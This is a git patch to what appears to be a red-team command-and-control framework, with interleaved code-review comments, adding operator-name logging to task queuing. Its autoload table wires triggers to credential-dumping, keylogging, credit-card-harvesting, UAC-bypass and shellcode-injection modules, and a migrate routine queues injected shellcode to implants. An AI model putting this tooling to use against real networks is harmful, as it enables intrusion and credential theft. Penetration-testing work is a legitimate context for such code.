From 72172ba83ce397a575fd8810878e2a47e052e235 Mon Sep 17 00:00:00 2001 From: m0rv4i Date: Mon, 11 Feb 2019 17:05:14 +0000 Subject: [PATCH] Add config option LogUsers, false by default but it set to true will prompt for a username (or can pass one to ImplantHandler with -u or --u ). Tasks run by that user will then be logged as that user. --- AutoLoads.py | 212 ++++++++++++++--------------- Config.py | 1 + DB.py | 11 +- Implant.py | 5 +- ImplantHandler.py | 329 ++++++++++++++++++++++++---------------------- Tasks.py | 5 +- 6 files changed, 287 insertions(+), 276 deletions(-) diff --git a/AutoLoads.py b/AutoLoads.py index 177820e..59c71f1 100644 --- a/AutoLoads.py +++ b/AutoLoads.py @@ -4,7 +4,7 @@ from DB import * from Config import * import os, base64 -def check_module_loaded( module_name, randomuri, force=False ): +def check_module_loaded( module_name, randomuri, user, force=False ): try: modules_loaded = select_mods(randomuri) if force: @@ -13,7 +13,7 @@ def check_module_loaded( module_name, randomuri, force=False ): module_name = modname file = open(("%s%s" % (ModulesDirectory,module_name)), "r") module = file.read() - new_task(("loadmodule %s" % module_name), randomuri) + new_task(("loadmodule %s" % module_name), user, randomuri) if modules_loaded: new_modules_loaded = "%s %s" % (modules_loaded, module_name) if module_name in modules_loaded: 
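Review bot: The new `user` parameter in `def check_module_loaded( module_name, randomuri, user, force=False ):` sits after `randomuri`, while the same patch gives `new_task` the order `(task, user, randomuri)`; both arguments are plain strings, so a caller that mixes the two conventions does not fail but records the implant URI as the user and the user as the URI. Pick one order for `new_task`, `check_module_loaded` and `run_autoloads(command, randomuri, user)`. Because the field is an optional log attribute, a keyword with a default, `def check_module_loaded(module_name, randomuri, user=None, force=False):`, also keeps any caller of the old three-argument form working. The body of `check_module_loaded` continues into the following hunks.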
@@ -24,117 +24,117 @@ def check_module_loaded( module_name, randomuri, force=False ): module_name = modname file = open(("%s%s" % (ModulesDirectory,module_name)), "r") module = file.read() - new_task(("loadmodule %s" % module_name), randomuri) + new_task(("loadmodule %s" % module_name), user, randomuri) update_mods(new_modules_loaded, randomuri) else: new_modules_loaded = "%s" % (module_name) file = open(("%s%s" % (ModulesDirectory,module_name)), "r") module = file.read() - new_task(("loadmodule %s" % module_name), randomuri) + new_task(("loadmodule %s" % module_name), user, randomuri) update_mods(new_modules_loaded, randomuri) except Exception as e: print ("Error loadmodule: %s" % e) -def run_autoloads(command, randomuri): - if "invoke-eternalblue" in command.lower(): check_module_loaded("Exploit-EternalBlue.ps1", randomuri) - if "invoke-psuacme" in command.lower(): check_module_loaded("Invoke-PsUACme.ps1", randomuri) - if "bloodhound" in command.lower(): check_module_loaded("BloodHound.ps1", randomuri) - if "brute-ad" in command.lower(): check_module_loaded("Brute-AD.ps1", randomuri) - if "brute-locadmin" in command.lower(): check_module_loaded("Brute-LocAdmin.ps1", randomuri) - if "bypass-uac" in command.lower(): check_module_loaded("Bypass-UAC.ps1", randomuri) - if "cred-popper" in command.lower(): check_module_loaded("Cred-Popper.ps1", randomuri) - if "cve-2016-9192" in command.lower(): check_module_loaded("CVE-2016-9192.ps1", randomuri) - if "convertto-shellcode" in command.lower(): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri) - if "decrypt-rdcman" in command.lower(): check_module_loaded("Decrypt-RDCMan.ps1", randomuri) - if "dump-ntds" in command.lower(): check_module_loaded("Dump-NTDS.ps1", randomuri) - if "get-computerinfo" in command.lower(): check_module_loaded("Get-ComputerInfo.ps1", randomuri) - if "get-creditcarddata" in command.lower(): check_module_loaded("Get-CreditCardData.ps1", randomuri) - if "get-gppautologon" in command.lower(): 
check_module_loaded("Get-GPPAutologon.ps1", randomuri) - if "get-gpppassword" in command.lower(): check_module_loaded("Get-GPPPassword.ps1", randomuri) - if "get-idletime" in command.lower(): check_module_loaded("Get-IdleTime.ps1", randomuri) - if "get-ipconfig" in command.lower(): check_module_loaded("Get-IPConfig.ps1", randomuri) - if "get-keystrokes" in command.lower(): check_module_loaded("Get-Keystrokes.ps1", randomuri) - if "get-hash" in command.lower(): check_module_loaded("Get-Hash.ps1", randomuri) - if "get-locadm" in command.lower(): check_module_loaded("Get-LocAdm.ps1", randomuri) - if "get-mshotfixes" in command.lower(): check_module_loaded("Get-MSHotFixes.ps1", randomuri) - if "get-netstat" in command.lower(): check_module_loaded("Get-Netstat.ps1", randomuri) - if "get-passnotexp" in command.lower(): check_module_loaded("Get-PassNotExp.ps1", randomuri) - if "get-passpol" in command.lower(): check_module_loaded("Get-PassPol.ps1", randomuri) - if "get-recentfiles" in command.lower(): check_module_loaded("Get-RecentFiles.ps1", randomuri) - if "get-serviceperms" in command.lower(): check_module_loaded("Get-ServicePerms.ps1", randomuri) - if "get-userinfo" in command.lower(): check_module_loaded("Get-UserInfo.ps1", randomuri) - if "get-wlanpass" in command.lower(): check_module_loaded("Get-WLANPass.ps1", randomuri) - if "invoke-pbind" in command.lower(): check_module_loaded("Invoke-Pbind.ps1", randomuri) - if "get-domaingroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-kerberoast" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-userhunter" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-hostenum" in command.lower(): check_module_loaded("HostEnum.ps1", randomuri) - if "inject-shellcode" in command.lower(): check_module_loaded("Inject-Shellcode.ps1", randomuri) - if "inveigh-relay" in command.lower(): check_module_loaded("Inveigh-Relay.ps1", 
randomuri) - if "inveigh" in command.lower(): check_module_loaded("Inveigh.ps1", randomuri) - if "invoke-arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri) - if "arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri) - if "invoke-dcsync" in command.lower(): check_module_loaded("Invoke-DCSync.ps1", randomuri) - if "invoke-eventvwrbypass" in command.lower(): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri) - if "invoke-hostscan" in command.lower(): check_module_loaded("Invoke-Hostscan.ps1", randomuri) - if "invoke-ms16-032-proxy" in command.lower(): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri) - if "invoke-ms16-032" in command.lower(): check_module_loaded("Invoke-MS16-032.ps1", randomuri) - if "invoke-mimikatz" in command.lower(): check_module_loaded("Invoke-Mimikatz.ps1", randomuri) - if "invoke-psinject" in command.lower(): check_module_loaded("Invoke-PSInject.ps1", randomuri) - if "invoke-pipekat" in command.lower(): check_module_loaded("Invoke-Pipekat.ps1", randomuri) - if "invoke-portscan" in command.lower(): check_module_loaded("Invoke-Portscan.ps1", randomuri) - if "invoke-powerdump" in command.lower(): check_module_loaded("Invoke-PowerDump.ps1", randomuri) - if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-reflectivepeinjection" in command.lower(): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri) - if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri) - if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri) - if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri) - if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-psexec" in 
command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri) - if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri) - if "invoke-sniffer" in command.lower(): check_module_loaded("Invoke-Sniffer.ps1", randomuri) - if "invoke-sqlquery" in command.lower(): check_module_loaded("Invoke-SqlQuery.ps1", randomuri) - if "invoke-tater" in command.lower(): check_module_loaded("Invoke-Tater.ps1", randomuri) - if "invoke-thehash" in command.lower(): check_module_loaded("Invoke-TheHash.ps1", randomuri) - if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri) - if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri) - if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri) - if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri) - if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri) - if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri) - if "portscan" in command.lower(): check_module_loaded("PortScanner.ps1", randomuri) - if "powercat" in command.lower(): check_module_loaded("powercat.ps1", randomuri) - if "invoke-allchecks" in command.lower(): check_module_loaded("PowerUp.ps1", randomuri) - if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri) - if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri) - if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri) - if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri) - if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri) - if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if 
"invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-dfsshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "add-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-domainuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netcomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-domaincomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netgroup" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netgroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-sharefinder" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netdomaincontroller" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netforest" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-netforestdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri) - if "invoke-wmievent" in command.lower(): 
check_module_loaded("Invoke-WMIEvent.ps1", randomuri) - if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri) - if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri) - if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri) +def run_autoloads(command, randomuri, user): + if "invoke-eternalblue" in command.lower(): check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user) + if "invoke-psuacme" in command.lower(): check_module_loaded("Invoke-PsUACme.ps1", randomuri, user) + if "bloodhound" in command.lower(): check_module_loaded("BloodHound.ps1", randomuri, user) + if "brute-ad" in command.lower(): check_module_loaded("Brute-AD.ps1", randomuri, user) + if "brute-locadmin" in command.lower(): check_module_loaded("Brute-LocAdmin.ps1", randomuri, user) + if "bypass-uac" in command.lower(): check_module_loaded("Bypass-UAC.ps1", randomuri, user) + if "cred-popper" in command.lower(): check_module_loaded("Cred-Popper.ps1", randomuri, user) + if "cve-2016-9192" in command.lower(): check_module_loaded("CVE-2016-9192.ps1", randomuri, user) + if "convertto-shellcode" in command.lower(): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user) + if "decrypt-rdcman" in command.lower(): check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user) + if "dump-ntds" in command.lower(): check_module_loaded("Dump-NTDS.ps1", randomuri, user) + if "get-computerinfo" in command.lower(): check_module_loaded("Get-ComputerInfo.ps1", randomuri, user) + if "get-creditcarddata" in command.lower(): check_module_loaded("Get-CreditCardData.ps1", randomuri, user) + if "get-gppautologon" in command.lower(): check_module_loaded("Get-GPPAutologon.ps1", randomuri, user) + if "get-gpppassword" in command.lower(): check_module_loaded("Get-GPPPassword.ps1", randomuri, user) + if "get-idletime" in command.lower(): check_module_loaded("Get-IdleTime.ps1", randomuri, user) + if 
"get-ipconfig" in command.lower(): check_module_loaded("Get-IPConfig.ps1", randomuri, user) + if "get-keystrokes" in command.lower(): check_module_loaded("Get-Keystrokes.ps1", randomuri, user) + if "get-hash" in command.lower(): check_module_loaded("Get-Hash.ps1", randomuri, user) + if "get-locadm" in command.lower(): check_module_loaded("Get-LocAdm.ps1", randomuri, user) + if "get-mshotfixes" in command.lower(): check_module_loaded("Get-MSHotFixes.ps1", randomuri, user) + if "get-netstat" in command.lower(): check_module_loaded("Get-Netstat.ps1", randomuri, user) + if "get-passnotexp" in command.lower(): check_module_loaded("Get-PassNotExp.ps1", randomuri, user) + if "get-passpol" in command.lower(): check_module_loaded("Get-PassPol.ps1", randomuri, user) + if "get-recentfiles" in command.lower(): check_module_loaded("Get-RecentFiles.ps1", randomuri, user) + if "get-serviceperms" in command.lower(): check_module_loaded("Get-ServicePerms.ps1", randomuri, user) + if "get-userinfo" in command.lower(): check_module_loaded("Get-UserInfo.ps1", randomuri, user) + if "get-wlanpass" in command.lower(): check_module_loaded("Get-WLANPass.ps1", randomuri, user) + if "invoke-pbind" in command.lower(): check_module_loaded("Invoke-Pbind.ps1", randomuri, user) + if "get-domaingroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-kerberoast" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-userhunter" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-hostenum" in command.lower(): check_module_loaded("HostEnum.ps1", randomuri, user) + if "inject-shellcode" in command.lower(): check_module_loaded("Inject-Shellcode.ps1", randomuri, user) + if "inveigh-relay" in command.lower(): check_module_loaded("Inveigh-Relay.ps1", randomuri, user) + if "inveigh" in command.lower(): check_module_loaded("Inveigh.ps1", randomuri, user) + if "invoke-arpscan" in command.lower(): 
check_module_loaded("Invoke-Arpscan.ps1", randomuri, user) + if "arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user) + if "invoke-dcsync" in command.lower(): check_module_loaded("Invoke-DCSync.ps1", randomuri, user) + if "invoke-eventvwrbypass" in command.lower(): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user) + if "invoke-hostscan" in command.lower(): check_module_loaded("Invoke-Hostscan.ps1", randomuri, user) + if "invoke-ms16-032-proxy" in command.lower(): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user) + if "invoke-ms16-032" in command.lower(): check_module_loaded("Invoke-MS16-032.ps1", randomuri, user) + if "invoke-mimikatz" in command.lower(): check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) + if "invoke-psinject" in command.lower(): check_module_loaded("Invoke-PSInject.ps1", randomuri, user) + if "invoke-pipekat" in command.lower(): check_module_loaded("Invoke-Pipekat.ps1", randomuri, user) + if "invoke-portscan" in command.lower(): check_module_loaded("Invoke-Portscan.ps1", randomuri, user) + if "invoke-powerdump" in command.lower(): check_module_loaded("Invoke-PowerDump.ps1", randomuri, user) + if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-reflectivepeinjection" in command.lower(): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user) + if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user) + if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri, user) + if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-psexec" in command.lower(): 
check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) + if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri, user) + if "invoke-sniffer" in command.lower(): check_module_loaded("Invoke-Sniffer.ps1", randomuri, user) + if "invoke-sqlquery" in command.lower(): check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user) + if "invoke-tater" in command.lower(): check_module_loaded("Invoke-Tater.ps1", randomuri, user) + if "invoke-thehash" in command.lower(): check_module_loaded("Invoke-TheHash.ps1", randomuri, user) + if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user) + if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user) + if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri, user) + if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user) + if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user) + if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri, user) + if "portscan" in command.lower(): check_module_loaded("PortScanner.ps1", randomuri, user) + if "powercat" in command.lower(): check_module_loaded("powercat.ps1", randomuri, user) + if "invoke-allchecks" in command.lower(): check_module_loaded("PowerUp.ps1", randomuri, user) + if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user) + if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri, user) + if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri, user) + if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri, user) + if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri, 
user) + if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-dfsshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "add-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-domainuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netcomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-domaincomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netgroup" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netgroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-sharefinder" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netdomaincontroller" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netforest" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-netforestdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-wmiregcachedrdpconnection" in 
command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user) + if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user) + if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user) + if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) + if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user) diff --git a/Config.py b/Config.py index dd7e28f..a93d745 100644 --- a/Config.py +++ b/Config.py @@ -17,6 +17,7 @@ QuickCommand = urlConfig.fetchQCUrl() DownloadURI = urlConfig.fetchConnUrl() Sounds = "No" ServerPort = "443" +LogUsers = True EnableNotifications = "No" # ClockworkSMS - https://www.clockworksms.com diff --git a/DB.py b/DB.py index 283a0e9..40b15c1 100644 --- a/DB.py +++ b/DB.py @@ -42,7 +42,8 @@ def initializedb(): create_newtasks = """CREATE TABLE NewTasks ( TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, RandomURI TEXT, - Command TEXT);""" + Command TEXT, + User TEXT);""" create_urls = """CREATE TABLE URLs ( URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, @@ -137,7 +138,7 @@ def get_implants_all(): else: return None -def get_nettasks_all(): +def get_newtasks_all(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() 
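Review bot: `run_autoloads` is rewritten line-for-line only to append `user`, leaving roughly ninety identically shaped `if "<trigger>" in command.lower(): check_module_loaded("<module>", randomuri, user)` statements, and the new side re-adds duplicated triggers verbatim (`get-netuser` three times, `invoke-psexec` twice). A table of (trigger, module) pairs walked by one loop makes the duplicates visible, lowers `command` once instead of per line, and turns the next signature change into a one-line edit. The file uses `raw_input` elsewhere in this patch, so it appears to run on Python 2; an ordered list of pairs rather than a dict preserves the existing load order where several triggers match one command (`inveigh-relay` and `inveigh`, `invoke-arpscan` and `arpscan`).
```python
# (trigger substring matched against command.lower(), module file to load);
# order matters where several triggers match the same command.
AUTOLOAD_MODULES = [
    ("invoke-eternalblue", "Exploit-EternalBlue.ps1"),
    ("invoke-psuacme", "Invoke-PsUACme.ps1"),
    # ... remaining pairs, copied from the existing if-chain ...
]


def run_autoloads(command, randomuri, user):
    """Queue a loadmodule task for every module whose trigger appears in command."""
    lowered = command.lower()
    for trigger, module in AUTOLOAD_MODULES:
        if trigger in lowered:
            check_module_loaded(module, randomuri, user)
```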
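Review bot: `LogUsers = True` contradicts the commit message, which says the option is false by default; one of the two should change, and since enabling it adds a username prompt to every start of the handler, the off-by-default in the message reads as the intended behaviour. The neighbouring switches in Config.py (`Sounds = "No"`, `EnableNotifications = "No"`) are string flags, so a bare boolean introduces a second convention for the same kind of setting; if a boolean is kept, a comment should say what the flag does, e.g. `LogUsers = False  # True: prompt for (or accept via -u) an operator name and store it with every queued task`.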
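Review bot: Adding `User TEXT` to the `CREATE TABLE NewTasks` statement only affects databases created from scratch; an existing database keeps the three-column table, and the new `INSERT INTO NewTasks (RandomURI, Command, User)` in `new_task` then fails with `sqlite3.OperationalError` on every queued task instead of degrading to the old behaviour. `initializedb` looks like a create-only routine (its caller is outside this hunk), so an upgrade path is needed, e.g. check `PRAGMA table_info(NewTasks)` for a `User` column and run `ALTER TABLE NewTasks ADD COLUMN User TEXT` when it is missing. The column is nullable, and when `LogUsers` is off the rows presumably carry NULL; documenting that in the schema comment keeps the task log queryable for both modes.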
@@ -155,18 +156,18 @@ def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPas c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry)) conn.commit() -def drop_nettasks(): +def drop_newtasks(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() c.execute("DELETE FROM NewTasks ") conn.commit() -def new_task( task, randomuri ): +def new_task( task, user, randomuri ): conn = sqlite3.connect(DB) conn.text_factory = str c = conn.cursor() - c.execute("INSERT INTO NewTasks (RandomURI, Command) VALUES (?, ?)",(randomuri, task)) + c.execute("INSERT INTO NewTasks (RandomURI, Command, User) VALUES (?, ?, ?)",(randomuri, task, user)) conn.commit() def get_lastcommand(): diff --git a/Implant.py b/Implant.py index 461dde5..100950f 100644 --- a/Implant.py +++ b/Implant.py @@ -101,10 +101,9 @@ IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDa new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label) def autoruns(self): - new_task("loadmodule Core.ps1", self.RandomURI) + new_task("loadmodule Core.ps1", "autoruns", self.RandomURI) update_mods("Core.ps1", self.RandomURI) result = get_autoruns() if result: - autoruns = "" for autorun in result: - new_task(autorun[1], self.RandomURI) + new_task(autorun[1], "autoruns", self.RandomURI) diff --git a/ImplantHandler.py b/ImplantHandler.py index 7007602..8b77afe 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py 
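Review bot: `def new_task( task, user, randomuri ):` inserts the new argument between two existing ones, so a caller still on the old two-argument form fails loudly with `TypeError`, but a caller that appends `user` last, the order `check_module_loaded` uses in this same patch, silently stores the user in `RandomURI` and the implant URI in `User`. Placing `user` last, or making it a keyword with a default (`def new_task(task, randomuri, user=None):`), removes that trap and keeps old callers working. A docstring would also help, since this is now the single write path for the task audit trail: `"""Queue task for the implant at randomuri, recording user (None when LogUsers is off) in the User column."""`.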
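Review bot: The literal `"autoruns"` passed as the user in both `new_task` calls in `autoruns` is a sentinel that shares the `User` column with operator-supplied names, so an operator who enters `autoruns` at the prompt is indistinguishable in the task log from the automatic loads. A module-level constant, e.g. `AUTORUNS_USER = "autoruns"`, used at both call sites documents the intent and gives one place to change the marker; a value that the username prompt cannot produce (if the prompt validates input) would make the distinction reliable. Removing the unused `autoruns = ""` local is a good cleanup.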
@@ -1,6 +1,6 @@ #!/usr/bin/python -import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess +import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse import datetime from datetime import datetime, timedelta from sqlite3 import Error @@ -37,7 +37,7 @@ def createproxypayload(): newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire ) - startup("Created new proxy payloads") + startup(user, "Created new proxy payloads") def createdaisypayload(): name = raw_input("Daisy name: e.g. DC1 ") @@ -58,7 +58,7 @@ def createdaisypayload(): newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" ) - startup("Created new %s daisy payloads" % name) + startup(user, "Created new %s daisy payloads" % name) def createnewpayload(): domain = raw_input("Domain or URL: https://www.example.com ") @@ -90,7 +90,7 @@ def createnewpayload(): newPayload.CreateMsbuild("%s_" % domainbase) newPayload.CreatePython("%s_" % domainbase) new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire ) - startup("Created new payloads") + startup(user, "Created new payloads") def argp(cmd): args = "" 
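Review bot: `argparse` is now imported twice on the same line: it already appears earlier in the list and the change appends `, argparse` again. The duplicate is harmless at runtime but is flagged by linters and suggests the line was edited without reading it; drop the trailing `, argparse`. One import per line, as PEP 8 recommends, would have made the duplicate obvious.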
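Review bot: `startup(user, "Created new proxy payloads")` references `user`, but `createproxypayload` takes no such parameter and nothing in this hunk defines it; the same applies to `createdaisypayload` (@@ -58), `createnewpayload` (@@ -90), `migrate` (@@ -156) and `runcommand` (@@ -439, -461, -499, -517), whereas `startup` and `commandloop` receive it explicitly. Presumably `user` is a module-level global set by the new prompt / `-u` handling, which is not in this chunk; if it is instead a local of the entry point, each of these raises `NameError` on first use. Mixing a global with explicit threading is fragile either way: either pass `user` as a parameter everywhere (`def createproxypayload(user):` and so on), or drop it from `startup`'s signature and read the global in one place, with a comment naming where it is assigned.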
@@ -156,11 +156,12 @@ def migrate(randomuri, params=""): elif implant_comms == "Proxy": shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch)) - check_module_loaded("Inject-Shellcode.ps1", randomuri) - new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri) - new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri) + check_module_loaded("Inject-Shellcode.ps1", randomuri, user) + new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) + new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) + +def startup(user, printhelp = ""): -def startup(printhelp = ""): try: if os.name == 'nt': os.system('cls') @@ -174,6 +175,10 @@ def startup(printhelp = ""): print (Colours.END + "") try: + if user is not None: + print (Colours.GREEN) + print ("User: %s" % user) + print (Colours.END) ii = get_implants() if ii: for i in ii: @@ -247,7 +252,7 @@ def startup(printhelp = ""): ExError = e if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"): - startup() + startup(user) if "output-to-html" in implant_id.lower(): generate_table("Tasks") 
